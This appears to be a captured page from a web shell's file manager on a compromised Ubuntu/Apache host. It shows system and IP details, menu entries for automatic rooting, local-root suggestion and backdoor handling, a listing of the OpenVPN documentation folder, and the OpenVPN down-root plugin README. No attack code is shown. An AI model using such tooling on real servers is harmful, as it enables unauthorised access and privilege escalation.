Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
openvpn /
Delete
Unzip
Name
Size
Permission
Date
Action
examples
[ DIR ]
drwxr-xr-x
2016-11-18 12:18
AUTHORS
28
B
-rw-r--r--
2015-05-18 20:48
COPYING.gz
3.18
KB
-rw-r--r--
2019-05-08 15:50
COPYRIGHT.GPL.gz
6.67
KB
-rw-r--r--
2019-05-08 15:50
NEWS.Debian.gz
1.33
KB
-rw-r--r--
2019-04-24 20:45
PORTS
3.76
KB
-rw-r--r--
2015-05-18 20:48
README
2.02
KB
-rw-r--r--
2015-12-21 13:56
README.Debian.gz
3.43
KB
-rw-r--r--
2019-04-24 20:45
README.IPv6
1.99
KB
-rw-r--r--
2019-05-08 15:50
README.auth-pam
2.54
KB
-rw-r--r--
2019-05-08 15:50
README.down-root
866
B
-rw-r--r--
2019-05-08 15:50
README.polarssl
789
B
-rw-r--r--
2019-05-08 15:50
changelog.Debian.gz
2.14
KB
-rw-r--r--
2019-05-08 15:50
copyright
1.98
KB
-rw-r--r--
2019-04-24 20:45
management-notes.txt.gz
10.31
KB
-rw-r--r--
2019-05-08 15:50
Save
Rename
down-root -- an OpenVPN Plugin Module SYNOPSIS The down-root module allows an OpenVPN configuration to call a down script with root privileges, even when privileges have been dropped using --user/--group/--chroot. This module uses a split privilege execution model which will fork() before OpenVPN drops root privileges, at the point where the --up script is usually called. The module will then remain in a wait state until it receives a message from OpenVPN via pipe to execute the down script. Thus, the down script will be run in the same execution environment as the up script. BUILD Build this module with the "make" command. The plugin module will be named openvpn-down-root.so USAGE To use this module, add to your OpenVPN config file: plugin openvpn-down-root.so "command ..." CAVEATS This module will only work on *nix systems, not Windows.